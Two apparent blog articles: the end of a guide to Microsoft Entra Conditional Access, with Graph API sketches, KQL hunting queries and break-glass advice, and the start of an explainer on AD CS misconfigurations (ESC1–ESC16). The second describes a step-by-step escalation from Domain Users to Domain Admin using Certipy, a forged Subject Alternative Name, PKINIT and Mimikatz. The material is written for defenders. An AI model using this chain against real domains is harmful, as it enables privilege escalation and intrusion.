The practical implication of HRU for a CA admin is that there is no tool, anywhere, that can examine your tenant's CA policies and certify that no sequence of policy edits could ever leak access to a sensitive resource. Vendors offer policy *testers* that simulate a single edit against the current population; that is decidable. The question "is the system safe under all possible future edits?" is not. This is why audit trails, change-control gates, and least-privilege role assignments on the CA admin role matter as much as the CA policies themselves.

Naming the limits clears the way to name the active unsolved problems -- the ones the field is still working on, where the current state of the art admits it is partial.

9. Where the policy plane is still incomplete

Microsoft's own 2026 documentation for Conditional Access on AI agents calls the current implementation "a lightweight enforcement mechanism designed to block unauthorized or risky agents, not a full policy suite." That is not marketing modesty. It is an admission that the most active frontier of policy enforcement -- agent identities -- is deliberately under-specified.

Five open problems sit on that frontier in 2026.

"Organizations are expanding Zero Trust across more users, applications, and now a growing population of AI agent identities ... the Conditional Access Optimization Agent moves beyond static guidance to continuous, context-aware identity posture optimization." [@ms-techcom-ca-optimization-agent]

9.1 Agent identity policy semantics

What grants should exist for AI agents beyond block and allow? Useful candidate grants include: "read-but-not-move" for mail or files; "business-hours-only"; "any autonomous action requires a fresh sign-off from the on-behalf-of human." None of these exist as first-class CA grant types in 2026.

What does exist: CA targeting of agent identities -- the ability to match a policy on the agent identity rather than the human -- and the Conditional Access Optimization Agent, which gives administrators continuous recommendations on policy posture [@ms-techcom-ca-optimization-agent]. The targeting is there. The grant taxonomy is still mostly the human one, applied imperfectly.

9.2 Cross-vendor CAEP interop

The wire format was finalised in September 2025 [@helpnet-2025-openid][@openid-caep-final]. Production receiver coverage outside Microsoft Entra-internal resource providers is partial. Two large vendors agreeing on an event schema is necessary but not sufficient for cross-vendor revocation to work in practice; the receiving side needs to act on the events. The next eighteen months are the period in which CAEP either becomes the cross-vendor wire format for revocation, or it does not.

9.3 Workload-identity grant set

What richer expressions could exist for non-human identities? The current Microsoft Learn page lists workload-identity detections: investigationsThreatIntelligence, suspiciousSignins, adminConfirmedServicePrincipalCompromised, leakedCredentials, maliciousApplication, suspiciousApplication, anomalousServicePrincipalActivity, suspiciousAPITraffic [@ms-workload-identity-risk]. The detections exist; the grant taxonomy stops at block.

Candidate richer grants: "workload attestation" (the service principal proves it is running on attested infrastructure), "verifiable claim from a trusted attester" (a third party signs a statement about the workload), "step-up authorization for sensitive scopes" (a higher-privilege scope requires a separate per-request authorization step). None of these is generally available in 2026.

Workload identity: a non-human identity in Entra ID, meaning a service principal, an application registration's owned service principal, or a managed identity in Azure. Workload identities authenticate via client secrets, client certificates, federated credentials, or (for managed identities) instance-metadata-service tokens. Conditional Access for workload identities currently applies only to single-tenant service principals registered in the tenant; it does not cover multi-tenant SaaS apps or managed identities [@ms-workload-identity-ca].

9.4 The break-glass paradox

Emergency-access accounts must be excluded from CA. If a CA misconfiguration locks out every admin, the break-glass account is the recovery path. But exclusion creates a high-value bypass: an attacker who compromises a break-glass account inherits its exclusion.

There is no clean answer. Microsoft's guidance is exclusion plus FIDO2 binding plus alerting: the break-glass accounts have hardware-bound FIDO2 keys (so they cannot be phished), they are excluded from all CA policies (so misconfiguration cannot lock them out), and every sign-in is alerted on (so misuse is detected within minutes) [@ms-emergency-access].

Run two break-glass accounts, not one. Store the FIDO2 keys in separate physical safes under separate custodians. Use them only for a quarterly recovery exercise; if they sign in at any other time, treat the alert as a P1 incident. The operational pattern accepts that you have a bypass and treats the bypass as the highest-value alert in the tenant [@ms-emergency-access].

9.5 The risk-engine transparency problem

No vendor in the Section 7 survey publishes model architecture, feature vector size, or per-detection precision and recall. Microsoft does not. Okta does not. Google does not. Defenders, auditors, and regulators must accept a black-box score.

This matters in three places. First, for incident response: when an "atypical travel" detection fires for an executive, the responder cannot see which features contributed and how strongly. Second, for compliance: an auditor asked to evidence the effectiveness of the control plane gets the operating output (3-tier risk levels) but not a quantitative evaluation. Third, for the risk-engine vendors themselves, who must respond to legitimate regulatory questions about model bias and operational reliability without revealing the architecture that attackers would use to evade detection.

The article does not predict a resolution. It names the gap.

The architecture is incomplete by admission. It is also actionable today. A competent tenant administrator can deploy a sensible baseline in an afternoon.

10. Using Conditional Access today

The architectural story ends; the operational story begins. Here is what a competent tenant looks like in 2026.

The licensing reality

Conditional Access is not a feature every Microsoft 365 tenant gets. It is a feature gated by SKU. The licensing tiers are:

Entra ID Free. Security Defaults only [@ms-security-defaults]. No Conditional Access policies. No risk-based conditions. No CA-driven CAE (the critical-event-evaluation subsystem -- for events like account disable, password reset, and high user risk -- still propagates to CAE-aware M365 services at the service layer regardless of SKU; see Section 6.6) [@ms-cae-concept].
Entra ID P1. Conditional Access is unlocked [@ms-ca-overview]. You can author policies with any of the non-risk conditions: users, apps, locations, devices, client app, platform. You can demand any of the non-risk grants.
Entra ID P2. Adds risk-based conditions. signInRiskLevels and userRiskLevels become usable [@ms-id-protection-overview]. ID Protection's full report pane (risky users, risky sign-ins, risk detections) is accessible. The legacy ID-Protection-side risk policies retire 1 October 2026 [@ms-id-protection-policies].
Workload Identities Premium. A separate SKU. Unlocks CA scoped to service principals [@ms-workload-identity-ca].

This corrects a premise discarded earlier: "Conditional Access is the policy plane every M365 tenant runs on" is not true. Many tenants run on Security Defaults. The "policy plane every tenant runs on" is the cloud sign-in pipeline; CA is the configurable richer layer that P1+ tenants opt into.

Start with the managed baselines

Microsoft-managed Conditional Access policies are the recommended starting point [@ms-managed-policies]. They auto-deploy in Report-only mode, run for at least 45 days while administrators review the impact in the Sign-in logs, and are auto-enabled with a 28-day pre-enablement notification unless administrators opt out [@ms-managed-policies]. The currently shipping baselines, per Microsoft Learn, include:

MFA for admins accessing Microsoft admin portals (the most-privileged roles).
MFA for users who already have per-user MFA enabled (a migration aid).
MFA and reauthentication for risky sign-ins (the P2 baseline).
Block legacy authentication.
Block access for high-risk users (P2-tier protection on the user-risk surface).
Block all high-risk agents accessing all resources (Preview, AI-agent surface).

The original announcement called for a 90-day report-only window [@weinert-2023-managed-policies][@helpnet-2023-microsoft-entra-policies]. The current default is 45 days [@ms-managed-policies]; the window shrank as Microsoft gained confidence that customers were not surprised by the auto-enablement.

Five custom policies on top of the baselines

Beyond the managed policies, well-run tenants, in operational experience, run five custom policies on top of the baselines [@ms-ca-policy-common]: block legacy authentication unconditionally [@ms-managed-policies]; require the phishing-resistant Authentication Strength for any user in a privileged role [@ms-auth-strengths]; require compliantDevice for admin centres, finance apps, and customer-data exports [@ms-intune-compliance-partners]; restrict privileged sign-ins to a named-location allow-list with block-or-step-up outside it [@ms-ca-network]; and, where Entra ID P2 is licensed, demand a sign-in-risk-based step-up (MFA at medium risk, a passwordless or phishing-resistant method at high risk) [@ms-id-protection-policies].

Note: 1. Block legacy authentication. 2. Phishing-resistant Authentication Strength for admin roles. 3. Require compliant device for sensitive applications. 4. Named-location restrictions for privileged roles. 5. Sign-in-risk-based step-up where Entra ID P2 is available.

Automation entry points (Microsoft Graph)

The Graph endpoints administrators care about:

GET /identity/conditionalAccess/policies -- list policies. POST to create, PATCH to update [@ms-graph-capolicy].
GET /identityProtection/riskDetections -- the per-detection log. Filterable by riskLevel, riskState, userPrincipalName, activityDateTime [@ms-graph-riskdetection].
GET /identityProtection/riskyUsers -- the per-user risk view.
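
A minimal sketch of calling the first of those endpoints from JavaScript follows. It assumes the Graph v1.0 base URL and an access token that already carries a suitable permission such as `Policy.Read.All`; the helper names `policiesRequest` and `listPolicies` are hypothetical, and paging via `@odata.nextLink` is omitted.

```javascript
const GRAPH_BASE = 'https://graph.microsoft.com/v1.0';

// Builds the request for listing Conditional Access policies.
function policiesRequest(accessToken) {
  return {
    url: GRAPH_BASE + '/identity/conditionalAccess/policies',
    init: { method: 'GET', headers: { Authorization: 'Bearer ' + accessToken } },
  };
}

// fetchImpl is injectable so the sketch can be exercised without a network call.
async function listPolicies(accessToken, fetchImpl = fetch) {
  const { url, init } = policiesRequest(accessToken);
  const res = await fetchImpl(url, init);
  if (!res.ok) throw new Error('Graph returned HTTP ' + res.status);
  const body = await res.json();
  // Graph collections arrive in a "value" array; keep only the summary fields.
  return body.value.map((p) => ({ id: p.id, displayName: p.displayName, state: p.state }));
}
```

Calling `listPolicies(token)` with a real token returns one summary object per policy, which is enough to spot policies still sitting in report-only mode.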

A policy authored in code looks like this (truncated for readability):

{
  "displayName": "Require phishing-resistant for admins",
  "state": "enabledForReportingButNotEnforced",
  "conditions": {
    "users": { "includeRoles": ["62e90394-69f5-4237-9190-012177145e10"] },
    "applications": { "includeApplications": ["All"] }
  },
  "grantControls": {
    "operator": "OR",
    "authenticationStrength": { "id": "00000000-0000-0000-0000-000000000004" }
  }
}

The recommended deployment dance is enabledForReportingButNotEnforced first; let the Sign-in log show you the impact for a calibration window; promote to enabled only after the report-only data matches expectations [@ms-ca-report-only].
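
The promotion step can be sketched as a guarded PATCH builder. The helper names are hypothetical, and the sketch only constructs the request rather than sending it; it assumes the Graph v1.0 policy endpoint and that a PATCH carrying only `state` is sufficient to promote a policy.

```javascript
const CA_POLICIES_URL = 'https://graph.microsoft.com/v1.0/identity/conditionalAccess/policies/';

// Builds the PATCH that promotes a policy to enforced.
function promoteRequest(policyId, accessToken) {
  return {
    url: CA_POLICIES_URL + encodeURIComponent(policyId),
    init: {
      method: 'PATCH',
      headers: {
        Authorization: 'Bearer ' + accessToken,
        'Content-Type': 'application/json',
      },
      body: JSON.stringify({ state: 'enabled' }),
    },
  };
}

// Refuses to promote anything that is not currently in report-only mode,
// so a disabled or already-enforced policy is never touched by accident.
function promoteIfReportOnly(policy, accessToken) {
  if (policy.state !== 'enabledForReportingButNotEnforced') return null;
  return promoteRequest(policy.id, accessToken);
}
```

Keeping the guard separate from the request builder makes it easy to run the guard in a review script first and send the PATCH only after a human has read the report-only data.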

Audit-time visibility

Three surfaces matter:

Sign-in logs in the Entra portal show the per-sign-in evaluation, including which CA policies matched and which grants were satisfied.
Risk-detection log in Identity Protection (P2 only) shows the per-detection narrative: which riskEventType fired, with what additionalInfo, against which user.
The What-If tool simulates a policy evaluation for a hypothetical sign-in, before you enable a policy.

Detection engineering

For E5 tenants, the Sign-in logs and risk detections flow into Microsoft Sentinel (via the Microsoft Entra ID connector) or Defender XDR [@ms-sentinel-aad-connector]. A KQL skeleton for high-risk-with-CA-failure looks like:

SigninLogs
| where ResultType != 0
| join kind=inner (AADRiskDetections | where RiskLevel == "high") on UserPrincipalName, CorrelationId
| project TimeGenerated, UserPrincipalName, IPAddress, ConditionalAccessStatus, RiskEventType, FailureReason = ResultDescription

The aggregate scale figure is worth remembering: Microsoft processes "more than 100 trillion security signals" daily across all identity products [@ms-managed-policies]. The detection engineer is consuming a small slice that landed in their tenant.

Run the following in Microsoft Sentinel or the Entra advanced hunting blade to surface sign-ins that succeeded *despite* a high-confidence risk detection -- the most operationally interesting subset. The query is original to this article; the schema it targets is the canonical Microsoft Sentinel Entra ID connector tables `SigninLogs` and `AADRiskDetections` [@ms-sentinel-aad-connector], and the join-and-filter pattern follows the practice documented in Microsoft's Sentinel hunting guidance [@ms-sentinel-hunting].

let window = 7d;
SigninLogs
| where TimeGenerated > ago(window)
| where ResultType == 0
| where ConditionalAccessStatus == "success"
| join kind=inner (
    AADRiskDetections
    | where TimeGenerated > ago(window)
    | where RiskLevel == "high"
) on UserPrincipalName, CorrelationId
| project TimeGenerated, UserPrincipalName, IPAddress, AppDisplayName, RiskEventType, ConditionalAccessPolicies
| order by TimeGenerated desc

The expected count for a well-tuned tenant is small. Spikes warrant a priority-2 (P2) incident investigation.

Break-glass

Two emergency-access accounts. FIDO2-bound. Excluded from every CA policy. Stored as separate hardware tokens in separate safes. Every sign-in is wired to a P1 alert. Per Section 9.4 and Microsoft Learn's emergency-access guidance, this is the acknowledged operational compromise to the break-glass paradox [@ms-emergency-access].

Break-glass account: a non-personal Entra ID administrator account excluded from Conditional Access and from MFA enforcement, used only when the primary identity infrastructure has failed. Best practice: at least two such accounts, with hardware FIDO2 keys stored separately, monitored by an unconditional alert on any sign-in.

The article has answered "who decided?" five times over: by signal, by policy, by token, by session, by operational pattern. One section remains: the misconceptions that keep recurring.

11. Misconceptions that recur

Every time these questions come up in practice, the same wrong answers come back. The corrections are worth memorising.

Only if you have Entra ID P1 or higher and have configured CA policies. Free SKU tenants run Security Defaults, which is a coarse tenant-wide on/off switch, not CA [@ms-security-defaults]. CA is unlocked at P1 [@ms-ca-overview]; risk-based conditions are unlocked at P2 [@ms-id-protection-overview]. The "every tenant runs on CA" framing you sometimes see in marketing material is incorrect.

No. CA is a cloud control plane. Kerberos and NTLM against on-prem domain controllers do not consult Entra at all [@ms-ca-overview]. If your threat model includes on-prem lateral movement, layer in Defender for Identity and the standard on-prem hardening playbook.

No. CAE is event-driven push from the policy plane to CAE-aware resource APIs. The Microsoft Learn CAE document gives the latency ceiling precisely: "the goal for critical event evaluation is for response to be near real time, but latency of up to 15 minutes might be observed because of event propagation time; however, IP locations policy enforcement is instant" [@ms-cae-concept]. There is no 30-second poll. The token can live up to 28 hours because the revocation is event-driven.

No. Clients advertise CAE-readiness via the `cp1` client capability in token requests, specifically by adding `cp1` to the `xms_cc` claim mechanism (or by calling `WithClientCapabilities(new[] { "cp1" })` in MSAL) [@ms-claims-challenge][@ms-app-resilience-cae]. The Microsoft Learn claims-challenge page is explicit: "The only currently known value is `cp1`" [@ms-claims-challenge]. The CAE-aware token is recognisable by its long lifetime (up to 28 hours) and by the resource API's willingness to issue an `insufficient_claims` challenge, not by a Boolean claim.

No. Third-party MDM compliance partners can write the device compliance state into Entra via Intune's compliance-partner API [@ms-intune-compliance-partners]. The CA grant reads `isCompliant` on the device object; it does not care which MDM wrote that value. Microsoft's preferred deployment is Intune, but the integration point is open by design.

In 2023. The public preview of CA filters for workload identities opened on 26 October 2022 [@vansurksum-2022-workload-ca]; the Microsoft Entra Workload Identities standalone product reached GA in late November 2022, and the Conditional Access feature itself reached general availability later in 2023 [@ms-workload-identity-ca]. Any article asserting a 2025 GA date for workload-identity CA is incorrect.

No. Every sign-in produces a Sign-in log entry; ID Protection emits a `riskDetection` only when at least one detector fires for that sign-in [@ms-graph-riskdetection]. Most sign-ins produce no `riskDetection`. Detection engineers querying for risk should join the Sign-in log with the riskDetections log and treat unjoined rows as "no risk flagged at the moment."

No Microsoft primary source publicly describes the production model architecture or names a per-sign-in feature-vector size. What is published is the detection taxonomy (about two dozen named `riskEventType` values [@ms-id-protection-risks][@ms-graph-riskdetection]), the timing split (real-time / near-real-time / offline [@ms-risk-detection-types]), and the three-tier risk output. The "transformer with 80+ signals" framing is folk knowledge with no Microsoft primary source behind it. The article reframes it as "ML-based with detailed architecture publicly undisclosed."

Not on its own. A standard MFA grant does not defeat a kit like Evilginx, which proxies both the password and the MFA challenge in real time. The defence is to require the *phishing-resistant Authentication Strength* in CA: FIDO2 with hardware attestation, Windows Hello for Business, or multifactor certificate-based authentication [@ms-auth-strengths]. The cryptographic origin-binding in WebAuthn-class credentials defeats AitM by construction. But the defence only works *when the grant is applied*. A CA policy that demands phishing-resistant for admin roles but not for users will block AitM against admins and not against users.
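The join recommended above for detection engineers (Sign-in log against the riskDetections log) can be sketched in a few lines. This is a minimal illustration over in-memory rows, not a Graph client. The field names `id`, `requestId`, and `riskEventType` are assumptions modelled on the sign-in and `riskDetection` resources, and the sample rows are invented.

```python
from collections import defaultdict


def join_signins_with_risk(signins, risk_detections):
    """Left-join sign-in rows to riskDetection rows.

    Every sign-in appears exactly once in the output. A sign-in with no
    matching detection gets an empty list, which should be read as
    "no risk flagged at the moment", not as "proven safe".
    """
    by_request = defaultdict(list)
    for det in risk_detections:
        # Assumed join key: the detection's requestId equals the sign-in id.
        by_request[det["requestId"]].append(det["riskEventType"])

    return [
        {**s, "riskEventTypes": by_request.get(s["id"], [])}
        for s in signins
    ]


# Invented sample data for illustration only.
signins = [
    {"id": "req-1", "user": "alice"},
    {"id": "req-2", "user": "alice"},
]
risk_detections = [
    {"requestId": "req-2", "riskEventType": "anonymizedIPAddress"},
]

for row in join_signins_with_risk(signins, risk_detections):
    print(row["id"], row["riskEventTypes"] or "no risk flagged at the moment")
```

A left join is the point of the sketch: an inner join would silently drop the majority of sign-ins, which produce no detection at all.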

12. Two planes, one boundary

Replay Alice's Tuesday.

Identity Protection's signal plane scored her 09:02 sign-in. The score was below the medium-risk threshold. Conditional Access's policy plane evaluated four matching policies. Two demanded MFA; her cached refresh token already satisfied that grant from yesterday. One demanded a compliant device; Intune had marked her laptop compliant overnight. None demanded the block grant. The token issuer issued a CAE-aware bearer token with a 28-hour lifetime. Exchange Online accepted the token. Outlook's data path opened. Bytes returned to Alice.

If, twelve minutes later, an attacker tries to sign in with Alice's credentials from an anonymizing proxy, ID Protection will fire a detection. The detection will lift her user risk to high. CAE will deliver the high-user-risk event to Exchange. Exchange will issue a claims challenge on the next call from Alice's Outlook. Outlook will replay the challenge to Entra. Entra will re-run CA, see the elevated risk, demand step-up MFA, and either issue a fresh token (after Alice satisfies the step-up) or refuse.
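The claims-challenge step in that sequence can be made concrete from the client's side. The sketch below assumes the resource API signals the challenge in a `WWW-Authenticate` header carrying `error="insufficient_claims"` and a base64-encoded `claims` value; the helper name `parse_claims_challenge` and the sample payload are illustrative, not taken from any Microsoft library.

```python
import base64
import json
import re


def parse_claims_challenge(www_authenticate):
    """Return the decoded claims from an insufficient_claims challenge, else None."""
    # Collect key="value" pairs from the header.
    params = dict(re.findall(r'(\w+)="([^"]*)"', www_authenticate))
    if params.get("error") != "insufficient_claims":
        return None
    encoded = params.get("claims", "")
    # Restore any stripped base64 padding before decoding.
    padded = encoded + "=" * (-len(encoded) % 4)
    return json.loads(base64.b64decode(padded))


# Build an illustrative header; the claims payload is invented.
payload = {"access_token": {"nbf": {"essential": True, "value": "1604106651"}}}
claims_b64 = base64.b64encode(json.dumps(payload).encode()).decode()
header = f'Bearer realm="", error="insufficient_claims", claims="{claims_b64}"'

print(parse_claims_challenge(header))
```

In a real client the extracted claims would be handed back to the token library on the next token request, which is the "replay the challenge to Entra" step in the paragraph above.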

The modern identity boundary is not a wall. It is a conversation between planes.

Key idea: The boundary is a conversation between planes, not a wall.

The open frontier is real. Agent identities want a richer grant taxonomy than the human one provides. Cross-vendor CAEP wants production receivers outside Microsoft. Workload-identity policy wants grants that go beyond block. The break-glass paradox wants an answer that does not depend on operational discipline. None of these problems will resolve in 2026. They are the next frontier.

What the reader should now be able to do: trace a sign-in through the signal, policy, token, and session planes; read a conditionalAccessPolicy JSON and predict the evaluation outcome; identify which class of attack each grant defends against; and name, by reference to specific Microsoft Learn pages, what CA does not defend against. The promise from Section 1 is delivered.

Today, 100 percent of consumer Microsoft accounts older than 60 days have multifactor authentication. -- Alex Weinert, Microsoft Identity, November 2023 [@weinert-2023-managed-policies]

Who decided this token is good? The boundary itself decided, by composing the work of every plane named above.

Certified Pre-Owned: AD CS and Active Directory's Second Trust Root

noreply@paragmali.com (Parag Mali) — Mon, 25 May 2026 00:00:00 GMT

**Microsoft Certificate Services shipped in Windows 2000 Server on February 17, 2000 and was renamed Active Directory Certificate Services in Windows Server 2008.** Its misconfigurations remained admin-tunable knobs without numbered names for twenty-one years. In June 2021, Will Schroeder and Lee Christensen at SpecterOps published *Certified Pre-Owned* and named eight of them ESC1 through ESC8. Through 2025 the community extended the catalog to ESC16 across IFCR, Compass Security, SpecterOps, TrustedSec, and independent researchers, each one abusing one of six primitives: the template, the issuing authority, the transport, the mapping, the authentication step, or the persistence substrate. Only one ESC has cleanly received a CVE-class Microsoft patch (EKUwu / ESC15 -> CVE-2024-49019; ESC8 received KB5005413 *hardening guidance* rather than a CVE, and the adjacent Certifried CVE-2022-26923 patches the dNSHostName impersonation chain on the Machine template rather than a numbered ESC); the rest are administrative hardening matters per Microsoft's Windows Security Servicing Criteria. The KB5014754 strong-mapping rollout closed ESC9 and ESC10 but is bypassed by ESC16. The architectural property -- that every CA in NTAuth is a key parallel to krbtgt that can mint a Domain Admin authenticator -- is not closable by any patch. The operational playbook is to run Locksmith, BloodHound CE, MDI, PSPKIAudit, and Certipy in parallel, ingest CA logs, and prepare a Lane-3 CA rebuild before you need it.

1. Two Hours, No KRBTGT, No Touch on Tier Zero

The operator's stopwatch reads two hours and seven minutes when the SOCKS proxy lights up with a Ticket-Granting Ticket for the Domain Administrator account. No service was crashed. No LSASS process was touched. No Tier-Zero principal had its password reset. The krbtgt account hash from last quarter's rotation is still good. The certificate that minted the ticket was issued, signed, and logged by the enterprise's own Certificate Authority -- the one the IT director's slide deck calls "internal PKI" -- against a template the help desk uses to enroll Wi-Fi clients.

Walk the chain backwards. The operator joined Domain Users four hours ago via a phishing payload that never escalated past medium integrity. They ran one tool. Certipy find enumerated every certificate template the foothold account was permitted to enroll in [@certipy-gh]. One of those templates -- call it WiFi-Auth -- had three properties: low-privilege enrollment open to Authenticated Users, the Client Authentication Extended Key Usage attached, and the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT bit flipped on. Certipy req produced a Certificate Signing Request that supplied DOMAIN\Administrator as the Subject Alternative Name. The Enterprise CA, doing exactly what its template configured it to do, issued the certificate. Certipy auth -pfx exchanged the certificate for a TGT via the Public Key Cryptography for Initial Authentication extension to Kerberos. Mimikatz ptt loaded the TGT into the operator's session. Domain Admin.

What did not fire is the part that frustrates the incident response team. There was no Windows Event 4624 for the Administrator account anywhere on the domain. Microsoft Defender for Identity raised no lateral-movement alert. No Pass-the-Ticket detection triggered, because the ticket was minted as fresh PKINIT authentication, not replayed. The only artifact in the entire chain was a single Event ID 4886 in the CA's issuance log -- the event the SOC's SIEM does not ingest, because the SOC's SIEM was built to follow krbtgt and not to follow PKI.

PKINIT: Public Key Cryptography for Initial Authentication in Kerberos (RFC 4556). The protocol extension that lets a Kerberos client present a certificate to a Key Distribution Center and receive a Ticket-Granting Ticket in return. Authored by L. Zhu (Microsoft) and B. Tung (Aerospace), published in June 2006 [@rfc4556]. PKINIT is the authentication step that converts an issued certificate into a TGT, and therefore the step every ESC must cross to convert a misconfigured template into Domain Admin.

The TGT in this scenario is produced by Active Directory's Key Distribution Center after it validates the certificate against its trusted certificate stores. The KDC does not call back to the CA -- it trusts any certificate signed by a CA published into the forest's NTAuthCertificates container. That trust relationship is the load-bearing detail; we will return to it in section eight.

So how is any of this possible? The operator's organization rotated krbtgt twice last quarter, runs a top-quartile EDR product, and bought Microsoft Defender for Identity with the AD CS sensor add-on. The simple answer is: rotating krbtgt closes one of the keys that can mint a Domain Admin authenticator in this forest. It does not close the others. The forest has more than one such key, and nobody told the IR plan.

Key idea: Every domain whose CA can issue authentication certificates has two trust roots that can mint a Domain Admin authenticator, not one. The first is the krbtgt account hash. The second is the private key of any Certificate Authority published into the forest's NTAuthCertificates container. Rotating one does not touch the other. The catalog this article walks through is the community's attempt to enumerate the misconfigurations that turn the second trust root into a path low-privilege users can walk.

The vocabulary for this surface -- the named techniques, the numbered identifiers, the tool that enumerates them in eleven seconds -- did not exist until June 2021. The misconfigurations did. They had been shipping as customer-tunable knobs in Microsoft's identity stack since Windows Server 2003. If this surface has been available for twenty-one years, why did it take twenty-one years for someone to give the misconfigurations names?

2. Twenty-One Years of Unnamed Knobs

February 17, 2000. Windows 2000 Server reaches general availability. Microsoft Certificate Services -- the AD-integrated CA role -- ships as an optional server component on day one [@wikipedia-w2k]. The role is not yet called Active Directory Certificate Services; that rename arrives with Windows Server 2008. The shipping defaults that the operator in section one just exploited were already buildable on the 2000 release.

You will see both anchor dates in the literature. Semperis's CVE-2022-26923 retrospective writes that "In Windows Server 2008, Microsoft introduced AD CS" [@semperis-cve]. The Microsoft Learn current overview describes AD CS as a "Windows Server role for issuing and managing public key infrastructure (PKI) certificates" [@msl-adcs-current] without distinguishing the ship date from the rename date. This article uses the dual anchor: the role *shipped* in 2000 as Microsoft Certificate Services, and was *renamed* Active Directory Certificate Services in 2008. The misconfigurations the ESC catalog enumerates were enabled by Windows Server 2003's V2 templates and have not been default-off since.

The misconfigurations the catalog later attacks did not all arrive at once. Three Microsoft releases between 2000 and 2008 built the surface piece by piece.

Windows Server 2003 (general availability April 24, 2003 [@wikipedia-ws2003]) shipped Version 2 (V2) certificate templates, user and computer autoenrollment over the V2 schema, and the AD-stored template store [@msl-ws2003-ca]. Most of the surface ESC1 and ESC4 later attack first appears in this release: msPKI-Certificate-Name-Flag, the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT bit, per-template DACLs editable in Active Directory Sites and Services, and the modifiable Extended Key Usage list. The Enrollee-Supplies-Subject flag, in particular, is a customer-tunable bit; it ships off by default on the stock templates but is a one-click enable in certtmpl.msc [@msl-adcs-2012r2]. Microsoft's documentation warned against it on sensitive templates. It did not warn against it as a numbered identifier.

Certificate templates have version numbers tied to the Active Directory schema. V1 templates ship with Windows 2000 and are non-modifiable from the GUI. V2 templates ship with Windows Server 2003 and are fully modifiable; they introduce the per-template DACL and the editable msPKI-Certificate-Name-Flag properties the catalog attacks. V3 templates ship with Windows Server 2008 and add Suite B cryptography support. The catalog mostly attacks V2 templates; ESC15 specifically attacks the residual V1 templates that ship pre-installed and cannot be removed.

Windows Server 2008 (general availability February 27, 2008 [@wikipedia-ws2008]) renamed the role to Active Directory Certificate Services and added new role services: Online Certificate Status Protocol Responder, Network Device Enrollment Service, Certificate Enrollment Web Service, and Certificate Enrollment Policy Web Service. These role services expanded the transport surface that ESC8 and ESC11 later attack. The Windows Server 2012 R2 documentation page hh831740 became the canonical reference SpecterOps later linked from the 2021 paper [@msl-adcs-2012r2].

Between 2008 and 2021 Microsoft published hardening guidance for AD CS in several places -- Test Lab Guides, PKI design pages, role-service deployment docs [@msl-pki-design]. The guidance covered template ACLs, manager approval, least-privilege enrollment, and the Enrollee-Supplies-Subject bit. It did not assign numbered identifiers to specific dangerous combinations. It did not appear in MSRC's vulnerability pipeline. It did not get a Common Vulnerabilities and Exposures registration. The configurations were documented but unnamed.

In 2019, two seeds for the named class appeared. Géraud de Drouas at the French ANSSI published a brief GitHub note that the Active Directory Public-Information property set includes altSecurityIdentities, which lets an attacker with that permission map their own certificate onto a privileged user [@dedrouas-altsec]. The note ends with a striking line: "This issue has been responsibly disclosed to MSRC and received a 'won't fix' response." The same year Microsoft began documenting the szOID_NTDS_CA_SECURITY_EXT extension in certificate-related KBs, though without making it default-on. The substrate for what would become ESC9, ESC10, and ESC14 was already in place; nobody had named it yet.

Twenty-one years from the role's ship date, then. Twenty-one years of admin-tunable knobs. No numbered identifiers, no patch cadence, no scanner enumeration, no MSRC pipeline. Microsoft documented every one of these settings individually, often well; what was missing was the catalog. Hardening guidance without numbered identifiers produces no defensive prioritization in real enterprises, because enterprise security programs prioritize against catalogs, not against documentation pages [@bollinger-ekuwu]. So what happened in June 2021 that turned a documentation pattern into a catalog?

flowchart LR
    A["2000: Microsoft Certificate Services ships in Windows 2000 Server"] --> B["2003: V2 templates and autoenrollment"]
    B --> C["2008: Role renamed Active Directory Certificate Services"]
    C --> D["2019: de Drouas notes altSecurityIdentities abuse"]
    D --> E["June 2021: SpecterOps catalog, ESC1 through ESC8"]
    E --> F["2021 to 2022: KB5005413, CVE-2022-26923, KB5014754"]
    F --> G["2022 to 2023: ESC9 to ESC12 from Lyak, Heiniger, Knobloch"]
    G --> H["2024: ESC13 to ESC15, Knudsen and Bollinger, CVE-2024-49019"]
    H --> I["2025: ESC16, strong-mapping full enforcement"]

3. Six Primitives Every ESC Abuses

Before opening the catalog, install the vocabulary. Every ESC -- without exception -- abuses one of six primitives: the template, the issuing authority, the enrollment transport, the certificate mapping, the authentication bridge, and the persistence substrate. Once you have these six names in your head, the sixteen ESCs compose into a small grid.

The Template

A certificate template is an Active Directory object stored in the CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration partition that tells an Enterprise CA what kind of certificate to issue and to whom. Templates carry their own DACL controlling who can enroll, who can write, and who can autoenroll. They carry a msPKI-Certificate-Name-Flag attribute whose bits control how the Subject and Subject Alternative Name fields are populated. They carry an Extended Key Usage list that names what the certificate is permitted to do. And they carry a Manager Approval bit that gates whether issuance is automatic or whether a CA officer must approve each request [@msl-adcs-2012r2].

The Active Directory-stored object specifying who can request what kind of certificate from an Enterprise CA. Templates carry per-object DACLs (enrollment, autoenrollment, write), a `msPKI-Certificate-Name-Flag` controlling Subject and SAN behavior, an Extended Key Usage list, and a Manager Approval bit. V1 templates (Windows 2000) are non-modifiable; V2 templates (Windows Server 2003) are fully modifiable; V3 templates (Windows Server 2008) add Suite B cryptography.

ESC1, ESC2, ESC3, ESC4, and ESC15 all attack the template. They differ only in which template property is misconfigured. (ESC9 also begins on a template flag, CT_FLAG_NO_SECURITY_EXTENSION, but its effect lives in the mapping layer; we file it under mapping below, matching SpecterOps's own Certify taxonomy [@specterops-certify-docs-index].)

The Issuing Authority

An Enterprise CA is a Windows Server role service that signs certificate requests against published templates. To be trusted for authentication, the CA must be published into the forest's NTAuthCertificates container. That container is the single list of CA certificates the Key Distribution Center trusts for PKINIT. The CA carries its own security descriptor controlling who can enroll, who can manage certificates, and who can manage the CA itself. It carries two registry flags that change its issuance behavior: EDITF_ATTRIBUTESUBJECTALTNAME2, which permits requesters to specify arbitrary Subject Alternative Names, and IF_ENFORCEENCRYPTICERTREQUEST, which controls whether RPC enrollment requires packet privacy [@compass-esc11]. The 2022 KB5014754 patch introduced szOID_NTDS_CA_SECURITY_EXT, a Microsoft-specific extension carrying the requester's Security Identifier; that extension is the load-bearing artifact of the strong-mapping enforcement track [@kb5014754].

Enterprise CA: The AD-integrated certificate authority role in AD CS. Publishes certificate templates into Active Directory, processes certificate requests against those templates, and signs issued certificates with its private key. To be trusted for Windows authentication, the CA's certificate must be present in the forest-wide `NTAuthCertificates` container.

